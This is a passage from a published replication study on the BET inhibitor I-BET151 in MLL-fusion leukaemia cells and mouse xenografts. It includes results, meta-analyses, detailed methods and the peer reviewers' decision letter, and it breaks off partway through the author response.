(B–C) At the time of sacrifice, disease burden was evaluated in peripheral blood (PB), bone marrow (BM), and spleen cells. Number of mice analyzed: n = 8 for vehicle group and n = 10 for I-BET151 group. (B) The percent of MV4;11 cells was determined by flow cytometric analysis as the percent of HLA-A,B,C+ cells in the total nucleated population (both mouse and human cells). Dot plot with medians reported as crossbars. (C) The absolute number of MV4;11 cells each sample was also determined using CountBright absolute counting beads. Dot plot with medians reported as crossbars. Additional details for this experiment can be found at https://osf.io/jakpw/. https://doi.org/10.7554/eLife.25306.008 In addition to monitoring survival, disease burden was determined for vehicle control and I-BET151 treated mice. For the efficacy study, the median disease burden observed in the peripheral blood, bone marrow, and spleen were smaller in I-BET151 treated mice compared to the control mice (Figure 4B,C). This was also observed in the MTD study (Figure 3—figure supplement 1). For example, the median percent of leukaemia cells detected in the bone marrow of vehicle control mice was 10.7%, which was reduced to 5.3% in I-BET151 treated mice (Figure 4B). This compares to the representative example reported in Supplementary Figure 16A of Dawson et al. (2011), which reported 14% leukaemia burden in the bone marrow of the control mouse and 1.5% in the I-BET151 treated mouse where low-level residual leukaemia was reported after the 21 day treatment. To summarize, for the disease burden aspect of this experiment we found the results were in the same direction as the original study. To assess if I-BET151 impacted cell death, specifically apoptosis and necrosis, flow cytometric analysis was also performed on the isolated cells from the vehicle control or I-BET151 treated mice. The degree of apoptosis and necrosis was assessed within the leukaemia population by staining with Annexin V and propidium iodide (PI). Observationally, there was no notable difference in the peripheral blood or spleen, with a minor decrease in both apoptotic (Annexin V+PI-) and necrotic cells (Annexin V+PI+) observed in the bone marrow of I-BET151 treated mice compared to vehicle control (Figure 4—figure supplement 1). Unexpectedly, at the time of sacrifice, animal health issues were observed beyond the anticipated disease presentation for this model. These included gastrointestinal bloating in three of the I-BET151 treated mice and solid tumors detected in four of the vehicle control treated mice and two of the I-BET151 treated mice. While it has been previously noted that NOD-SCID mice have a high rate of spontaneous thymic lymphomas, no other tumor types were previously reported and tumors did not manifest until 20 weeks of age (Prochazka et al., 1992). To explore the origin of the observed tumors, sections were stained using a human leukocyte antigen (HLA-A,B,C) antibody (Figure 4—figure supplement 2). In all tested samples there was extensive staining, indicating the injected human leukaemia cells spread throughout the mouse outside the hematological tissues. This suggests these mice most likely succumbed to fulminant leukaemia manifesting often as extramedullary disease (EMD), a diagnosis that has been observed in a subset of patients with various types of AML (Ganzel et al., 2016). Indeed, the original study reported EMD in the majority of the control mice, in contrast to none of the I-BET151 treated mice (Dawson et al., 2011). Collectively, these observations raise the possibility that although a survival benefit was not observed with I-BET151 treatment in this replication attempt, despite an overall reduced disease burden, that health issues not directly related to leukaemia could have impacted mortality observed in some of the animals, particularly those treated with I-BET151. Additionally, busulfan conditioning could have influenced engraftment kinetics and disease progression in this animal model and potentially impacted the responsiveness of MV4;11 cells to I-BET151 treatment. Meta-analyses of original and replicated effects We performed a meta-analysis using a random-effects model, where possible, to combine each of the effects described above as pre-specified in the confirmatory analysis plan (Fung et al., 2015). To provide a standardized measure of the effect, a common effect size was calculated for each effect from the original and replication studies. Cohen’s d is the standardized difference between two independent means using the pooled sample standard deviation. For a one-sample test, Cohen’s d is the difference between the sample mean and the null value using the sample standard deviation. The hazard ratio (HR) is the ratio of the probability of a particular event, in this case death, in one group compared to the probability in another group. The estimate of the effect size of one study, as well as the associated uncertainty (i.e. confidence interval), compared to the effect size of the other study provides another approach to compare the original and replication results (Errington et al., 2014; Valentine et al., 2011). Importantly, the width of the confidence interval for each study is a reflection of not only the confidence level (e.g. 95%), but also variability of the sample (e.g. SD) and sample size. A meta-analysis of the I-BET151 IC50 values in MV4;11 and K-562 cells was not conducted since the original study reported single IC50 values. Comparing the original and replication results, the IC50 value reported in Dawson et al. (2011) for MV4;11 cells fell outside the 95% CI of the values generated during this replication attempt (Figure 1B). In K-562 cells, both the original and replication studies could not accurately determine the IC50 estimates indicating K-562 cells are largely unaffected by I-BET151. There were three comparisons made with the qRT-PCR data analyzing BCL2 expression following I-BET151 treatment (Figure 5A,B). For two of the comparisons, the fold BCL2 expression in each cell line was compared to a constant of 1, which represents the DMSO treated group (Figure 5A). The comparison of K-562 fold gene expression compared to a constant of 1 resulted in d = −2.04, 95% CI [−4.17, 0.13] in this study, whereas d = 1.30, 95% CI [−0.38, 2.88] for the data estimated a priori from Figure 3D in the original study (Dawson et al., 2011). A meta-analysis of these effects resulted in d = −0.307, 95% CI [−3.57,2.96], which was not statistically significant (p=0.854). The results are in opposition when considering the direction of the effect. The point estimate of the replication effect size was not within the confidence interval of the original result, nor was the point estimate of the original effect size within the confidence interval of the replication result. The comparison of MV4;11 fold gene expression compared to a constant of 1, resulted in d = 10.31, 95% CI [1.54, 19.86] in this replication attempt, d = 26.00, 95% CI [4.10, 48.25] for the data estimated from the original study (Dawson et al., 2011) and d = 15.13, 95% CI [0.94, 29.32] for a meta-analysis of the two effects. Both the original and replication results are consistent when considering the direction of the effect, with the point estimate of the replication effect size was within the confidence interval of the original result and vice versa. Further, the random effects meta-analysis resulted in a statistically significant effect (p=0.037). For the third comparison between MV4;11 and K-562 fold gene expression, this replication attempted resulted in d = 14.07, 95% CI [4.73, 23.59], which compares to d = 17.34, 95% CI [5.90, 29.04] for the data estimated from the original study (Dawson et al., 2011) (Figure 5B). A meta-analysis of these effects resulted in d = 15.37, 95% CI [5.99, 24.75], which was statistically significant (p=0.001). Additionally, both results are consistent when considering the direction of the effect with both effect size point estimates falling within the confidence interval of the other study. Meta-analyses of each effect. Effect size and 95% confidence interval are presented for Dawson et al. (2011), this replication study (RP:CB), and a random effects meta-analysis of those two effects. Sample sizes used in Dawson et al. (2011) and this replication attempt are reported under the study name. (A) Fold BCL2 expression in K-562 cells compared to a constant of 1 (DMSO) (meta-analysis p=0.854), and fold BCL2 expression in MV4;11 cells compared to a constant of 1 (DMSO) (meta-analysis p=0.037). (B) Fold BCL2 expression in MV4;11 cells compared to the fold BCL2 expression in K-562 cells (meta-analysis p=0.001). (C) HR for mice treated daily with I-BET151 compared to vehicle control (meta-analysis p=0.220). Additional details for these meta-analyses can be found at https://osf.io/vfp47/. https://doi.org/10.7554/eLife.25306.012 The comparison of the overall survival distributions between mice treated with I-BET151 compared to those that were treated with vehicle control resulted in a HR of 1.44, 95% CI [0.45, 4.56] for this replication attempt compared to a HR of 10.32, 95% CI [1.51, 70.63] for the original study (Dawson et al., 2011). A meta-analysis (Figure 5C) of these effects resulted in a HR of 3.30, 95% CI [0.49,22.18], which was not statistically significant (p=0.220). Both results are consistent when considering the direction of the effect, however the point estimate of the replication effect size was not within the confidence interval of the original result, and vice versa. The large confidence intervals of the meta-analysis along with a statistically significant Cochran’s Q test (p=0.085), suggests heterogeneity between the original and replication studies. This direct replication provides an opportunity to understand the present evidence of these effects. Any known differences, including reagents and protocol differences, were identified prior to conducting the experimental work and described in the Registered Report (Fung et al., 2015). However, this is limited to what was obtainable from the original paper and through communication with the original authors, which means there might be particular features of the original experimental protocol that could be critical, but unidentified. So while some aspects, such as cell lines, strain of mice, number of cells plated/injected, and specific BET inhibitor were maintained, others were changed at the time of study design (Fung et al., 2015) or in the execution of the replication. This includes differences such as the conditioning for xenotransplantation (sub-lethal irradiation to busulfan) and dose of I-BET151 used for the efficacy study (30 mg/kg to 20 mg/kg). The regimen used in this replication attempt has not been fully evaluated with MV4;11 cells regarding its impact on disease progression and treatment responsiveness, an important consideration, since the method of conditioning can influence overall and hematological toxicity, as well as overall survival, despite similar engraftment levels (Robert-Richard et al., 2006; Saland et al., 2015). Furthermore, other aspects were unknown or not easily controlled for. These include variables such as cell line genetic drift (Hughes et al., 2007; Kleensang et al., 2016), mouse sex (Clayton and Collins, 2014), circadian biological responses to therapy (Fu and Kettner, 2013), the microbiome of recipient mice (Macpherson and McCoy, 2015), housing temperature in mouse facilities (Kokolus et al., 2013), and differing compound potency resulting from different stock solutions (Kannt and Wieland, 2016) or from variation in cell division rates (Hafner et al., 2016). Whether these or other factors influence the outcomes of this study is open to hypothesizing and further investigation, which is facilitated by direct replications and transparent reporting. Materials and methods As described in the Registered Report (Fung et al., 2015), we attempted a replication of the experiments reported in Figures 2A, 3D, 4B and D, and Supplementary Figures 11A-B and 16A of Dawson et al. (2011). A detailed description of all protocols can be found in the Registered Report (Fung et al., 2015). Additional detailed experimental notes, data, and analysis are available on the Open Science Framework (OSF) (RRID:SCR_003238) (https://osf.io/hcqqy/; Shan et al., 2017). Cell culture Request a detailed protocol MV4;11 (ATCC, cat# CRL-9591, RRID:CVCL_0064) and K-562 cells (ATCC, cat#CCL-243, RRID:CVCL_0004) were maintained in RPMI-1640 medium supplemented with 10% fetal bovine serum (FBS) and 1% penicillin/streptomycin at 37°C in a humidified atmosphere at 5% CO2. Quality control data for both the MV4;11 and K-562 cell lines related to the in vitro experiments are available at https://osf.io/vb9q4/ and quality control data for the MV4;11 cell line related to the in vivo experiments are available at https://osf.io/5tvwe/. This includes results confirming the cell lines were free of mycoplasma contamination and common mouse pathogens. Additionally, STR DNA profiling of the cell lines was performed and all cells were confirmed to be the indicated cell lines when queried against STR profile databases. Therapeutic compounds Request a detailed protocol 25 mg of I-BET151 (Sigma-Aldrich, cat# SML0666; lot# 033M4620V) was dissolved in 601.8 µl filtered dimethyl sulfoxide (DMSO) to generate a 0.1 M stock, which was stored at 4°C until use for in vitro experiments. For in vivo experiments, I-BET151 (lot# 084M4722V) was dissolved in DMSO to generate a 60 mg/ml stock. This was further diluted to the appropriate working solution with vehicle (10% wt/vol Kleptose HPB in 0.9 %/g NaCl, pH 5.0), filter sterilized, and aliquoted (21 total) into glass vials. Final concentration of DMSO in the working solution was 5% (v/v). Aliquots were stored at 4°C until use when aliquots were brought to room temperature before injection. Cellular dose response assay Request a detailed protocol The doubling time of MV4;11 and K-562 cells were empirically determined by seeding at 4 × 104 cells per well into two 96-well plates. The day after seeding and another three days later an MTS cell proliferation assay (Promega CellTiter-Aqueous One, cat# G3582) was performed according to the manufacturer’s instructions with a 4 hr incubation at 37°C. Absorbance was read at 490 nm and the plate background was subtracted at 650 nm using a plate reader (Molecular Devices, SpectraMax 190) and Softmax Pro data acquisition and analysis software (RRID:SCR_014240), version 3.1.2. The doubling time of each cell line was calculated to be 48 hr and 36.2 hr for the MV4;11 and K-562 cell lines, respectively. Doubling time was calculated using the formula (doubling time = incubation time*ln(2)/ln(second plate average reading/first plate average reading)). For cellular dose response, MV4;11 and K-562 cells were seeded at 4 × 104 cells per well (non-edge wells) into a 96-well plate and incubated overnight. Cells were treated with serial dilutions of I-BET151 to yield 10 dilutions ranging from 0.001 nM to 1 mM, which differs from the conditions listed in the Registered Report due to solubility limits. I-BET151 doses from 0.001 nM to 100 µM were diluted with medium to give a final DMSO concentration of 0.1%, while the 1 mM concentration gave a final DMSO concentration of 1% due to drug solubility. Both concentrations of DMSO were used to treat control cells in addition to medium alone wells that were used for background subtraction. All conditions were done in technical triplicate. Following an incubation of 3 population doublings of the cell lines, an MTS cell proliferation assay was performed as described for the doubling time experiment. Percent viability was calculated as a percentage of DMSO treated cells after background subtraction (medium only wells). Values for each biological repeat were fit to a four-parameter logistic curve and absolute IC50 values were calculated with R software (RRID:SCR_001905), version 3.3.2 (R Core Team, 2016). Gene expression analysis Request a detailed protocol MV4;11 and K-562 cells were seeded at 1 × 105 cells per well in a 48 well plate in triplicate for each condition and incubated overnight. Cells were then treated with either 500 nM I-BET151 or an equivalent volume of DMSO (final concentration of 0.1% (v/v)) for 6 hr. Cells were then harvested and RNA isolated using the RNAspin mini kit (GE Healthcare, cat# 25-0500-70) according to manufacturer's instructions. RNA concentration and purity was determined (data available at https://osf.io/n8frz/) and samples were stored at −80°C until further analyzed. Total RNA was reverse transcribed into cDNA using SuperScript III First-Strand Synthesis System (GE Healthcare, cat# 27-9261-01) according to manufacturer's instructions. qRT-PCR reactions were then performed in technical triplicate using BCL2 and B2M-specific primers (sequences listed in Registered Report [Fung et al., 2015]), and SYBR Green PCR Master Mix (ThermoFisher, cat# 4344463) according to manufacturer’s instructions. Reaction volume was 20 µl and consisted of 10 µl 2X SYBR Green PCR Master Mix, 20 µM forward and reverse primers, and 5 µl RNA diluted in water. A negative control without RNA template was also included. PCR cycling conditions were used as follows: [1 cycle 95°C for 10 min -- 40 cycles 95°C for 15 s, 60°C 60 s] using a real-time PCR system (Bio-Rad, DNA Engine Opticon System) and Opticon Monitor Software (Bio-Rad, RRID:SCR_014241), version 1.4. BCL2 transcript levels were normalized to B2M levels in each sample and I-BET151 treated samples were compared to DMSO treated samples for each cell line using the ∆∆Ct method. Animals All animal procedures were approved by the University of Pennsylvania Stem Cell and Xenograft Core IACUC# 803506 and were in accordance with the University of Pennsylvania policies on the care, welfare, and treatment of laboratory animals. Four-week old female NOD-SCID mice (Jackson Laboratory, Stock No: 001303, RRID:IMSR_JAX:001303) were housed in sterile conditions using high-efficiency particulate arrestance (HEPA)-filtered micro-isolator with 12 hr light/dark cycles, and fed with sterile rodent chow and acidified water ad libitum. The mice were housed for approximately 3 weeks before being enrolled in the study. I-BET151 maximum tolerated dose (MTD) study Request a detailed protocol After acclimation, 20 female NOD-SCID mice were conditioned with 30 mg/kg Busulfan (Otsuka America Pharmaceutical, Inc., cat# NDC 59148-070-90) by intraperitoneal (IP) injection 24 hr prior to injection of MV4;11 cells. Conditioned mice were then intravenously injected via the tail vein with 1 × 107 MV4;11 cells in 0.2 ml sterile vehicle (PBS) (Gibco, Life Technologies, cat# 14190–136). Mice were inspected daily for signs of distress and the 'Mouse Health Scoring System' (Cooke et al., 1996) was used to record scores for each mouse over the course of the study. At day 21 post-injection, retro-orbital bleeds were collected and analyzed for leukaemia burden by flow cytometry. Detectable disease was not achieved on day 21 and daily inspection continued until day 34 when disease was detected. Animals were then ranked according to disease burden (percent HLA-A,B,C+ cells) and randomly assigned to one of four groups using an alternating serpentine method. Group assignment was done by simple randomization. All mice had detectable leukaemia at time of randomization and variability of disease burden was evenly distributed among the four conditions (One-way ANOVA; F(3,16) = 0.019, p=0.996). After randomization, mice received daily IP injections of vehicle control, 10 mg/kg I-BET151, 20 mg/kg I-BET151, or 30 mg/kg I-BET151 in a volume of 10 ml/kg body weight. Injection volume and dosing was kept constant throughout the treatment period. Mice were inspected daily for the duration of the 21 day drug treatment for decreased spontaneous activity (grooming and ambulation), ruffled fur, weight loss, and loss of hind limb motility. Mice were sacrificed if moribund, received a health-monitoring score of three, or within three days of the last treatment. Upon sacrifice, cardiac puncture was performed to collect the peripheral blood, and then the spleen and both tibias and femora were removed. Splenic cell suspension was made in cold PBS by gently mushing the spleen between two microscopic glass slides. Bones were flushed with cold PBS to isolate bone marrow cells. Red blood cells from samples were lysed using ammonium chloride solution (STEMCELL Technologies, cat# 07850) according to manufacturer’s instructions prior to flow cytometry analysis. I-BET151 efficacy study Request a detailed protocol After one week of acclimation, 28 female NOD-SCID mice were conditioned with Busulfan and injected with MV4;11 cells as described in the MTD study. Five mice died unexpectedly before the first retro-orbital bleed to assess leukaemia burden. The remaining 23 mice were analyzed on day 21 post-injection, with no engraftment detected. Similar to the MTD study, mice were analyzed again two weeks later, with leukaemia burden detected. Animals were then ranked according to disease burden (percent HLA-A,B,C+ cells) and randomly assigned to a group using an alternating serpentine method. Designation of vehicle control or I-BET151 to group was done by a simple randomization. All mice had detectable leukaemia at time of randomization and variability of disease burden was evenly distributed among the two conditions (Student’s t-test; t(21) = 0.028, p=0.978). After randomization, mice received daily IP injections of vehicle control or 20 mg/kg I-BET151 in a volume of 10 ml/kg body weight. Injection volume and dosing was kept constant throughout the treatment period. Mice were inspected daily and peripheral blood, spleen, and bone marrow cells were isolated upon sacrifice as described for the MTD study. Flow cytometry analysis Request a detailed protocol To assess leukaemia burden in peripheral blood, spleen, and bone marrow cells, a maximum of 106 cells were stained in a sample volume of 50 µl each. 20 µl of APC conjugated anti-human HLA-A,B,C (Biolegend, cat# 311410, RRID:AB_314879) or APC conjugated isotype control (Biolegend, cat# 400220, RRID:AB_326468) was added and incubated at room temperature for 15 min. CountBright absolute counting beads (Life Technology, cat# C36950) in 1X FACS lysing solution were added and incubated at room temperature for an additional 15 min. Flow cytometry analysis was performed on a Canto or LSRII (Becton-Dickinson) and analyzed with FlowJo software (Tree Star, Inc., RRID:SCR_008520), version 10.1. Gating strategy was described in the Registered Report with a representative example reported in Figure 4—figure supplement 3A. To assess cell death, a maximum of 106 cells were stained in a sample volume of 50 µl each. 5 µl of APC conjugated anti-human HLA-A,B,C or APC conjugated isotype control was added and incubated at 4°C for 30 min. After washing twice with 1 ml of 1X Binding Buffer and collecting cells by spinning at 300xg for 10 min, cells were resuspended in 100 µl of 1X Binding Buffer. 10 µl of Annexin V-FITC (Miltenyi Biotech Ltd, cat# 130-092-052) was added and incubated at room temperature for 15 min in the dark. After washing twice with 1 ml of 1X Binding Buffer and collecting cells by spinning at 300xg for 10 min, cells were resuspended in 500 µl of 1X Binding Buffer. Prior to flow cytometry analysis 5 µl of propidium iodide (PI) (Invitrogen, cat# P3566) was added. An initial attempt with 7-AAD, which was pre-specified in the Registered Report, was unsuccessful because of an inability to properly compensate, thus PI was substituted. Gating strategy was described in the Registered Report with a representative example reported in Figure 4—figure supplement 3B. Flow cytometry data for this work is also available via Flow Repository (RRID:SCR_013779; Spidlen et al., 2012), where it is directly accessible at https://flowrepository.org/id/FR-FCM-ZY68. Immunohistochemistry Request a detailed protocol Tissues were fixed in 10% buffered formalin (Fisher Scientific, cat# 23–245685) and subsequently embedded in paraffin. The paraffin blocks were sectioned (5 µm) and stained with mouse anti-human Class 1 HLA-A,B,C antibody (Abcam, cat# ab70328, RRID:AB_1269092) and counterstained with hematoxylin. Staining was performed on a BOND-IIITM instrument (Leica Biosystems, Wetzlar, Germany) using the Bond Polymer Refine Detection System (Leica Biosystems, cat# DS9800). Heat-induced epitope retrieval was done for 20 min with ER1 solution (Leica Biosystems, cat# AR9961). Incubation with the HLA-A,B,C antibody was at 1:1200 dilution for 15 min followed by 8 min post-primary step and 8 min incubation with polymer HRP. Then endogenous peroxidase was blocked for 5 min followed by a 10 min incubation with DAB substrate. All staining steps were performed at room temperature with slides washed three times between each step with Bond Wash Solution (Leica Biosystems, cat# AR9590) or water. A section of human tonsil tissue was processed in parallel as a positive control. Immunostaining was performed by the Pathology Clinical Service Center at the University of Pennsylvania, Perelman School of Medicine. Statistical analysis Request a detailed protocol Statistical analysis was performed with R software (RRID:SCR_001905), version 3.3.2 (R Core Team, 2016). All data, csv files, and analysis scripts are available on the OSF (https://osf.io/hcqqy/). Confirmatory statistical analysis was pre-registered (https://osf.io/kfx9p/) before the experimental work began as outlined in the Registered Report (Fung et al., 2015). Data were checked to ensure assumptions of statistical tests were met. A meta-analysis of a common original and replication effect size was performed with a random effects model and the metafor R package (Viechtbauer, 2010) (https://osf.io/vfp47/). The original study data was extracted a priori from the published figures by determining the mean and upper/lower error values for each data point. The extracted data were published in the Registered Report (Fung et al., 2015) and were used in the power calculations to determine the sample size for this study. Deviations from registered report Request a detailed protocol The range of I-BET151 doses used in cellular dose response assay was altered from 0.01 nM to 10 mM listed in the Registered Report to 1 pM to 1 mM reported in this replication attempt. This was due to the solubility of I-BET151 restricting the highest dose that could be tested in this replication attempt (1 mM), which was the same dose tested in the original study. For the in vivo experimentation, only female mice were used in this replication attempt rather than a male female split as outlined in the Registered Report. This deviation was caused by an inability to obtain male and female mice from the supplier when the MTD study was performed. To maintain consistency with the MTD study only female mice were utilized in the efficacy study. Furthermore, the time between MV4;11 injection and animal randomization was extended from the 21 days outlined in the Registered Report (Fung et al., 2015) due to undetectable disease burden at this time. Mice were checked for disease burden 2 weeks later to allow additional time for disease manifestation. This occurred in both the MTD and efficacy studies, with disease burden only becoming detectable after this additional time, after which the remaining aspects of the protocol were carried out. For the cell death flow cytometry analysis an initial attempt using 7-AAD was unsuccessful because of an inability to properly compensate, thus PI, a suitable viability stain, was substituted. Additional materials and instrumentation not listed in the Registered Report, but needed during experimentation are also listed above. References 1. 1 2. 2 3. 3 4. 4 5. 5 6. 6 7. 7 An experimental model of idiopathic pneumonia syndrome after bone marrow transplantation: I. The roles of minor H antigens and endotoxin 1. KR Cooke 2. L Kobzik 3. TR Martin 4. J Brewer 5. J Delmonte 6. JM Crawford 7. JL Ferrara (1996) Blood 88:3230–3239. 8. 8 9. 9 10. 10 11. 11 12. 12 13. 13 14. 14 15. 15 16. 16 Advances in Cancer Research 1. CA French (2016) 21–58, Small-Molecule Targeting of BET Proteins in Cancer, Advances in Cancer Research, Elsevier. 17. 17 Progress in Molecular Biology and Translational Science 1. L Fu 2. NM Kettner (2013) 221–282, The circadian clock in cancer development and therapy, Progress in Molecular Biology and Translational Science, Elsevier. 18. 18 19. 19 20. 20 21. 21 22. 22 23. 23 24. 24 25. 25 26. 26 27. 27 28. 28 29. 29 30. 30 31. 31 32. 32 33. 33 34. 34 35. 35 36. 36 37. 37 38. 38 R: A Language and Environment for Statistical Computing 1. R Core Team (2016) R Foundation for Statistical Computing, Vienna, Austria. 39. 39 40. 40 Human cell engraftment after busulfan or irradiation conditioning of NOD/SCID mice 1. E Robert-Richard 2. C Ged 3. J Ortet 4. X Santarelli 5. I Lamrissi-Garcia 6. H de Verneuil 7. F Mazurier (2006) Haematologica 91:1384. 41. 41 42. 42 43. 43 44. 44 45. 45 46. 46 47. 47 48. 48 49. 49 50. 50 51. 51 52. 52 53. 53 54. 54 Decision letter 1. Karen Adelman Reviewing Editor; Harvard University, United States In the interests of transparency, eLife includes the editorial decision letter and accompanying author responses. A lightly edited version of the letter sent to the authors after peer review is shown, indicating the most substantive concerns; minor comments are not usually included. Thank you for submitting your article "Replication Study: Inhibition of BET recruitment to chromatin as an effective treatment for MLL-fusion leukaemia" for consideration by eLife. Your article has been reviewed by three peer reviewers, and the evaluation has been overseen by a Reviewing Editor and Charles Sawyers as the Senior Editor. Two of the reviewers, Mark Dawson and M Dawn Teare, have agreed to share their names; a third reviewer remains anonymous. The following issues need to be addressed before acceptance, as outlined below: 1) The Abstract and text needs to make clear that (and how) the in vivo protocol employed deviated from the original protocol and acknowledge how this might alter the outcome. It seems very important to not give the wrong impression that the xenograft experiments of the original study could not be reproduced, which would easily be the take-home-message after a "superficial read" of the current manuscript. To avoid this impression, the authors should clearly highlight the most relevant deviations from the original study (i.e. the alternative conditioning regimen and the reduced I-BET151 dose) in the Abstract. 2) Complications to interpretation due to other animal health issues should be clearly described. Here, it is not necessary to describe all potential issues in detail in the main text (although perhaps in supplement), but to address the following possibility, raised by reviewer #1. "The fact that the reduction in disease burden following IBET treatment closely paralleled the findings reported in the original study yet a survival benefit was not observed here raises the possibility that leukaemia related mortality was not the primary cause for the mortality observed in at least some animals in the IBET treatment arm." Specific examples of places where clarification is in order are given below, as well as some additional suggestions, which have been extracted from the reviews: Reviewer #1: From a reader's perspective there is too much emphasis on the statistical testing performed and not enough discussion about the results and how variations to the original study should be interpreted. For experiments 1) and 2) the general results obtained very much led to the same conclusion. In experiment 1) however, although there was, as previously, a marked difference in sensitivity between MV4;11 (IC50 9 nM) and K562 (unmeasurable), the meta-analysis demonstrated poor reproducibility between the concentrations in the original and reproduced experiments for MV4:11 (IC50 of 26 nM previously). The main area of discrepancy relates to 3) the in vivo mouse experiment and specifically the efficacy study assessing overall survival. There are a number of methodological aspects of this study that differ substantially to the original study and these are not raised in the Abstract nor discussed adequately in the manuscript. Therapeutically, the dose of the drug was different (less, at 20 vs 30 mg/kg) as was the duration of therapy, with treatment starting at d35 instead of d21 as in the previous study. As disease activity was determined by examination of peripheral blood only and we know that this xenograft model gives disseminated disease, one interpretation could be that the results differed as a lower dose was used in the face of an increased disease bulk. Most importantly technically, the conditioning regime used was markedly different. 30mg/kg of Busulfan is a very different approach to the more conventional strategy of sub-lethal irradiation performed in the original study. The conditioning regime can dramatically alter engraftment kinetics and also the natural history of the disease. This is reflected in this particular case by the fact that one quarter of the mice on this study developed 'solid malignancies', which I assume to be extramedullary leukaemia. Furthermore 3/12 mice treated with I-BET developed gastrointestinal bloating and (whilst not explicitly described) presumably died for reasons that were independent of the leukaemia burden. This is alluded to by the authors when they state that "animal health issues were observed beyond the anticipated disease presentation of this model" but could be stressed more. These important issues impact significantly on an efficacy study that is essentially measuring all cause mortality. The fact that the reduction in disease burden following IBET treatment closely paralleled the findings reported in the original study yet a survival benefit was not observed here raises the possibility that leukaemia related mortality was not the primary cause for the mortality observed in at least some animals in the IBET treatment arm. All of the above differences would also explain the apparently contradictory finding that, although survival was not impacted, disease bulk was consistently less in the IBET treated arm. A significant issue with the manuscript as currently presented is that the reader is left unaware of these critical details when reading the reproduction. It is essential to communicate this both in the Abstract, in the Results section and when discussing the discrepant results. The results from the MTD study show that the mice in the 30mg/kg arm had the greatest variation in starting weight amongst all the cohorts. There is a 25% variation in weight between the heaviest and lightest mouse in this cohort whereas the starting weight of the mice in the other cohort's vary very little. The initial weight of the mice can contribute substantially to the observed toxicity of any intervention especially conditioning. This variation may be one of the reasons why more toxicity was observed in this cohort. Reviewer #2: The summary assessment of each experiment is not consistently written it states 'did not find a statistically significant' but the converse is not stated, i.e. 'we did see a statistically significant'. The summary needs to be consistent. This replication study has been powered from a statistical perspective so this needs to be clear in the Abstract. Reviewer #3: Most experiments reproduce key results of the original study, with the exception of in-vivo treatment studies in the MV4;11 AML xenograft model, where the authors only reproduce the impact on disease burden while impact on overall survival has been observed. For the interpretation of these results it should be noted that the replication study diverged from the original work in several experimental details that might be of relevance. Overall, the following major points should be considered prior to publication: In the replication of MV4;11 xenograft experiments several experimental conditions deviate from the original study. Most likely due to a lack of access to an irradiation unit, the authors conditioned NOD/SCID mice with a single dose of busulfan (30 mg/kg i.p. 24 hrs prior to MV4;11 transplantation), which has been reported to lead to comparable engraftment of human CD34+ cord blood cells. Apart from the difference in cell type, the original study by Robert-Richard et al. mainly used other dosing regimens (35 mg/kg 36 hrs prior to injection; or 2 x 25 mg 48/24 hrs prior to injection), which they found to be less toxic. While under these conditions, busulfan and irradiation performed similar in human CD34+ HSC engraftment, one cannot conclude that the used regimen has no impact on the in-vivo growth of MV4;11 AML cells (which, for example, are likely to have a much higher proliferation rate than CD34+ HSCs). In fact, another study (Saland et al., 2015) has documented significant differences in the growth of xenografted MV4;11 cells following irradiation vs. busulfan (20 mg/kg). Although the use of NSG and a lower busulfan dose does not allow for direct conclusions for the present study, these results illustrate how sensitive xenograft models are to conditioning regimens. As most prominent difference, after busulfan conditioning the MV4;11 model turned out to be much delayed compared to the original study, which might be explained by insufficient immunosuppression, toxicity of busulfan or its metabolites on MV4;11 cells, or other experimental differences (which the authors partially summarize in their Discussion). Beyond reducing the overall aggressiveness of the model (and, potentially, promoting a high incidence of xenograft-derived solid tumors, which has been observed by the authors), these altered experimental conditions may also impact the in-vivo responsiveness of MV4;11 cells to I-BET151, which should be discussed. This seems particularly important, since busulfan conditioning is still quite uncommon and the used regimen (30 mg/kg 24 hrs prior to injection) has neither been tested in MV4;11 cells, nor has it been evaluated regarding its impact on treatment responsiveness. Beyond changing the conditioning protocol, the authors (based on general toxicity studies) also decided to reduce the I-BET151 dose from 30 mg/kg to 20 mg/kg. While this seems reasonable for the specific experiment, the cause for the observed toxicity remains unclear and may (again) be related to the conditioning regimen. Most importantly, the use of a different dosing regimen on its own provides a possible explanation for reduced drug effects in the MV4;11 xenograft model. In fact, in recent work the authors of the original study show that reducing I-BET151 to 10 mg/kg has no impact on survival in this model (Gilan et al., Figure 3A). Overall, it cannot be assumed that the drug batch was simply more active and, therefore, needed to be reduced to achieve comparable in-vivo activities. While differences in drug batches should always be considered, the reduced tolerability might be due to the used conditioning regimen, and the differences in survival might simply be a consequence of the reduced I-BET151 dose used in this study. Overall, changes in the conditioning regimen and the use of a lower dose of I-BET151 may substantially alter the in-vivo response of MV4;11 cells and provide (independent) possible explanations for the observed reduction in in-vivo drug activity. In light of these concerns, it seems very important to not give the wrong impression that the xenograft experiments of the original study could not be reproduced, which would easily be the take-home-message after a "superficial read" of the current manuscript. To avoid this impression, the authors should clearly highlight the most relevant deviations from the original study (i.e. the alternative conditioning regimen and the reduced I-BET151 dose) in the Abstract. Moreover, these experimental differences should also be discussed more extensively in the Discussion. In the current Discussion, the authors first raise some uncertainties due to missing experimental details, then summarize consistent conditions, and then transition into various possible differences that are hard to control for (which are certainly relevant; differences in MV4;11 culture conditions such as different FBS batches could be added). However, for a comprehensive discussion it seems very adequate to first summarize consistent conditions, then highlight obvious and important differences in experimental design (i.e. different conditioning and different drug dose), and only then discuss additional factors that are not easy to control for. In summary, the design and execution of this replication study is of high quality, and all necessary changes to the original protocol have been implemented in the best possible way. However, the changes in the design of the xenograft study are substantial and might fully explain the observed differences in in-vivo effects of I-BET151. Due to these differences, the results of the performed xenograft experiments are not fully conclusive with respect to the reproduction of the original study, which should be highlighted more clearly. https://doi.org/10.7554/eLife.25306.014 Author response The following issues need to be addressed before acceptance, as outlined below: 1) The Abstract and text needs to make clear that (and how) the in vivo protocol employed deviated from the original protocol and acknowledge how this might alter the outcome. It seems very important to not give the wrong impression that the xenograft experiments of the original study could not be reproduced, which would easily be the take-home-message after a "superficial read" of the current manuscript. To avoid this impression, the authors should clearly highlight the most relevant deviations from the original study (i.e. the alternative conditioning regimen and the reduced I-BET151 dose) in the Abstract. We have revised the Abstract to reflect the most relevant deviations between this replication attempt and the original study. We have also included these deviations and expanded discussion on how they might alter the outcome in the main text. 2) Complications to interpretation due to other animal health issues should be clearly described. Here, it is not necessary to describe all potential issues in detail in the main text (although perhaps in supplement), but to address the following possibility, raised by reviewer #1. "The fact that the reduction in disease burden following IBET treatment closely paralleled the findings reported in the original study yet a survival benefit was not observed here raises the possibility that leukaemia related mortality was not the primary cause for the mortality observed in at least some animals in the IBET treatment arm." We have revised the manuscript to include many of the potential areas of 